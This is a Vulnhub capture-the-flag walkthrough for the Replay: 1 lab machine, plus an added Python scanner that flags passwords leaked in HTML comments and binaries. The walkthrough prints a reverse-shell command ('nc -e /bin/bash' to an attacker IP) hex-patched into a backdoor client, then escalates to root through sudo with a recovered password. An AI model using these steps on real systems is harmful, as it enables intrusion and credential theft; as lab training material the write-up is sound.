Vulnhub: Detailed Walkthrough of the Replay Machine (Getting a Root Shell)

Replay

Author: jason huawen

Target Information

Name: Replay: 1

Address:

https://www.vulnhub.com/entry/replay-1,278/

Identifying the Target Host's IP Address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:c9:15:8b      1      60  PCS Systemtechnik GmbH
 192.168.56.102  08:00:27:a0:d5:27      1      60  PCS Systemtechnik GmbH

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.102.

Nmap Scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-15 21:30 EDT
Nmap scan report for bogon (192.168.56.102)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 54:35:aa:49:eb:90:09:a1:28:f3:0c:9a:fb:01:52:0d (RSA)
|   256 e7:0b:6e:52:00:51:74:11:b6:cd:c6:cf:25:3a:1b:84 (ECDSA)
|_  256 3b:38:da:d7:16:23:64:68:8f:52:12:8a:14:07:6a:53 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/bob_bd.zip
|_http-server-header: Apache/2.4.25 (Debian)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, FourOhFourRequest, GetRequest, Kerberos, LPDString, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe: 
|     CH1:
|     Auth Failed Closing Connection... =-
|   DNSVersionBindReqTCP, HTTPOptions, SSLSessionReq, TLSSessionReq: 
|     CH1:
|     Auth Failed Closing Connection... =- 
|     Auth Failed Closing Connection... =-
|   GenericLines, NULL: 
|     CH1:
|   Help, RPCCheck: 
|     Auth Failed Closing Connection... =- 
|     CH1:
|_    Auth Failed Closing Connection... =-
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:A0:D5:27 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.14 seconds

Getting a Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ telnet 192.168.56.102 1337 
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.

CH1:
hello
exit
^C
quit

zsh: terminated  telnet 192.168.56.102 1337

It is not clear what service is running on port 1337.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ curl http://192.168.56.102           
<!-- P1:qGQjwO4h6g  -->
<style>
body{
background-color: coral;
}
@font-face{
font-family: "cool";
src: url('/files/cool.ttf')
}
body{
font-family: cool;
}
.color_txt{
color:purple;
}
.color_title{
color:pink
}
</style>
<body>
<span class="color_title">
<h1>
<img src="/media/welcome.gif"></img>
Bob's Website
</h1>
</span>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gif"></img>
<img src="/media/bob.png"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gi"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<br>
<span class="color_txt">
<p>
This is my website that I made by myself. I have several years of experience managing and creating IT systems. If you are interested in hiring
me you can find <a href="/files/CV.odt"> my CV here.</a> If after reading my CV you are still interested in hiring me then you can contact me
on my email: bob295018409@gmail.com
</p>
</span>
<img src="/files/myITTeam.png"> </img>
</body>

Visiting port 80, the returned page contains a comment, P1:qGQjwO4h6g. Is it a password?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ nikto -h http://192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2023-03-15 21:38:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/bob_bd.zip' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: 430, size: 57c5a1a9d26e8, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-03-15 21:39:03 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 92K
drwxr-xr-x  2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r--  1 kali kali  63K Mar 15 21:39 bob_bd.zip
-rw-r--r--  1 kali kali  13K Mar 15 21:35 CV.odt
-rw-r--r--  1 root root 4.0K Mar 15 21:33 nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ unzip bob_bd.zip 
Archive:  bob_bd.zip
  inflating: changelog.txt           
  inflating: client.bin              
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 256K
drwxr-xr-x  2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r--  1 kali kali  63K Mar 15 21:39 bob_bd.zip
-rwxr-xr-x  1 kali kali 1.2K Dec  6  2018 changelog.txt
-rwxr-xr-x  1 kali kali 158K Dec  6  2018 client.bin
-rw-r--r--  1 kali kali  13K Mar 15 21:35 CV.odt
-rw-r--r--  1 root root 4.0K Mar 15 21:33 nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ cat changelog.txt  
Changelog:

RG9uJ3QgZm9yZ2V0CgpQClMtPkItPkMtPkQtPlMKQy0+Qi0+UwpDLT5FLT5T

Next Update:
+ Add ASCII art
+ Fix bug where sometimes the backdoor fails to connect (fixed by reopening client.bin)
+ Add ablilty to be able to send more than hardcoded commands again (removed because of beefing up of security)


V4 [*clink* *clink* You will never be able to penetrate my defenses!]:
+ Backdoor will execute any command, too bad it only sends one hardcoded command :P (gonna have to add an input onto client)
+ Security beefed up bet no one can get through this, XOR and b64 is king

RW5kIG9mIGxvZw==

V3 [All wrapped up in a neat bow]:
+ Added a cool security challenge system to stop hackers
+ I am now compiling the python file into .bins
+ Added b64 system to improve security
Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==

V2 [The no go zone]:
+ Added b64 support
+ Added password check (validated by server)
RW5kIG9mIGxvZw==

V1 [And then there was light]:
+ I made a backdoor :D
+ Now I can access my server from anywhere without using ssh
RW5kIG9mIGxvZw==
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'RW5kIG9mIGxvZw==' | base64 -d                        
End of log                                                                                                                              

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==' | base64 -d 
N.T.S Added 2nd half of password into the backdoor so if you forget that's where it is furture me. End of log    

Running client.bin shows that a password must be entered.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ strings client.bin
home/c0rruptedb1t/MEGA/Projects And Operations/Project Replay/scripts/client.pydataIP: outputAF_INETEnter Password: sendmsgkeyencodexornotes00admincmd;echo Hello World, you are currently running as: ;whoamidecodestring--=======NOTES=======-- +Buy new milk (the current one is chunky) +2nd half of password is: h0TAIRNXuQcDu9Lqsyul +Find a new job +Call mom =====[END]=====commandlettersrecvoschoicesystem-= TERMINATING CONNNECTION =- 
client_socketrandominputstrclearraw_inputCommand to be executed: replacejointimebase64
?exit1230012300admincmd;SOCK_STREAMconnectsleepoutdataappendXORtmpAttempting to connect...(
Definitely the password I swear -> password123 <- Definitely the password I sweartypesbye<module>encodestringnumsHello there you're not being naughty are you? bob_pass123456789rblensumiterlongnameopenreadreprsitelevelrangeformatlocalsxrange__all____cmp____doc__compileglobalsinspect__dict____exit____file____iter____main____name____path__exc_typefromlist__class____enter__bytearrayexc_value__import____module____delattr____getattr____package____setattr__classmethod__builtins__staticmethod__metaclass__exc_traceback/usr/bin/python2
GCC: (Debian 8.2.0-6) 8.2.0

From this we learn that the second half of the password is: h0TAIRNXuQcDu9Lqsyul

The string found earlier in the web page source, qGQjwO4h6g, is probably the first half of the password.

So the full password is qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
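Added example (not code from the original walkthrough or from the machine): a small pre-release check that catches both leak patterns seen on this box, the first half of the password in the index page's HTML comment and the second half sitting as a printable string inside client.bin. The HTML and binary samples are constructed to mirror those findings.

```python
import re

# Added example, not the walkthrough's own code. Constructed sample inputs
# mirror the two leaks on this box: an HTML comment and a string in a binary.
SAMPLE_HTML = b"""<!-- P1:example1half  -->
<style>body{background-color: coral;}</style>
<body><h1>Bob's Website</h1></body>
"""
SAMPLE_BIN = (
    b"\x7fELF\x02\x01\x01" + bytes(range(32)) * 2
    + b"Enter Password: \x00"
    + b"+2nd half of password is: exampleSecondHalf\x00"
    + b"\x00\x01\x02password123\x00Hello there\x00"
)

MIN_LEN = 4  # same default as GNU strings(1)

# A labelled credential followed by a value, or the 'P<n>:' label this box used.
SECRET_RE = re.compile(
    r"(pass(word)?|secret|token)\s*(is)?\s*[:=]\s*\S|^P\d+:\S", re.I)

def printable_strings(data: bytes, min_len: int = MIN_LEN):
    """Core of strings(1): maximal runs of printable ASCII, at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def html_comments(html: bytes):
    """Text of every <!-- ... --> comment; the server sends these to every visitor."""
    return [m.group(1).strip().decode("utf-8", "replace")
            for m in re.finditer(rb"<!--(.*?)-->", html, re.S)]

def find_secret_hints(candidates):
    """Keep only strings that look like a labelled credential with a value."""
    return [s for s in candidates if SECRET_RE.search(s)]

def scan_html(html: bytes):
    """Secrets leaked through HTML comments in a page body."""
    return find_secret_hints(html_comments(html))

def scan_binary(data: bytes):
    """Secrets recoverable from a binary with nothing more than strings(1)."""
    return find_secret_hints(printable_strings(data))

if __name__ == "__main__":
    print("html:", scan_html(SAMPLE_HTML))      # ['P1:example1half']
    print("binary:", scan_binary(SAMPLE_BIN))   # ['+2nd half of password is: exampleSecondHalf']
```

Running it against a real build output or a staged web root before deployment would have flagged both halves of this password; the prompt string "Enter Password: " is deliberately not reported because it carries no value.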

Running client.bin

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ./client.bin
./client.bin: error while loading shared libraries: libpython2.7.so.1.0: cannot open shared object file: No such file or directory
         

Execution fails because a library file is missing; installing the corresponding library fixes it:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo apt install libpython2.7

echo Hello World, you are currently running as: ;whoamidecodestring--

It seems client.bin has a hardcoded command that runs whoami. Can we edit client.bin with vim so that we get a shell instead?

  1. xxd client.bin client.bin.dump

  2. Edit client.bin.dump with vim -b, changing the echo Hello World, .... part to echo Hello.... nc -e /bin/bash 192.168.56.146 5555. The length must stay the same; editing the hex values is enough (the text column does not need changing). CyberChef can be used to get both the original hex data and the replacement hex data.

  3. xxd -r client.bin.dump >client.bin

echo Hello World, you are currently running as: ;whoami

The corresponding hex data is:

65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 2c 20 79 6f 75 20 61 72 65 20 63 75 72 72 65 6e 74 6c 79 20 72 75 6e 6e 69 6e 67 20 61 73 3a 20 3b 77 68 6f 61 6d 69

Change it to:

echo Hello Worldddd;nc -e /bin/bash 192.168.56.146 5555

The corresponding hex data is:

65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 64 64 64 3b 6e 63 20 2d 65 20 2f 62 69 6e 2f 62 61 73 68 20 31 39 32 2e 31 36 38 2e 35 36 2e 31 34 36 20 35 35 35 35

Note that the bytes have to be changed one by one, and the length before and after the change must be identical.

Running the modified client.bin gives us a shell:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.102] 58350
id
uid=1000(bob) gid=1000(bob) groups=1000(bob),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),115(lpadmin),119(scanner)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash: fortune: command not found
bash: cowsay: command not found
bash: lolcat: command not found
bob@replay:/root$ cd /home
cd /home
bob@replay:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Dec  6  2018 .
drwxr-xr-x 22 root root 4.0K Dec  6  2018 ..
drwxr-xr-x 19 bob  bob  4.0K Dec  6  2018 bob
bob@replay:/home$ cd bob
cd bob
bob@replay:~$ ls -alh
ls -alh

bob@replay:~/Documents$ cd .ftp
cd .ftp
bob@replay:~/Documents/.ftp$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 bob bob 4.0K Dec  6  2018 .
drwxr-xr-x 4 bob bob 4.0K Dec  6  2018 ..
-rw-r--r-- 1 bob bob   49 Dec  6  2018 users.passwd
bob@replay:~/Documents/.ftp$ cat users.passwd
cat users.passwd
bob:b0bcat_1234567890:1100:1100::/ftp:/bin/false
bob@replay:~/Documents/.ftp$ sudo -l
sudo -l
[sudo] password for bob: b0bcat_1234567890

Matching Defaults entries for bob on replay:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on replay:
    (ALL : ALL) ALL
bob@replay:~/Documents/.ftp$ sudo /bin/bash
sudo /bin/bash
root@replay:/home/bob/Documents/.ftp# cd /root
cd /root
root@replay:~# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Dec  6  2018 .
drwxr-xr-x 22 root root 4.0K Dec  6  2018 ..
-rw-------  1 root root 5.1K Dec  6  2018 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  2 root root 4.0K Dec  6  2018 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec  6  2018 .selected_editor
root@replay:~# id 
id
uid=0(root) gid=0(root) groups=0(root)
root@replay:~# 

Posted 2023-03-16 11:30 by Jason_huawen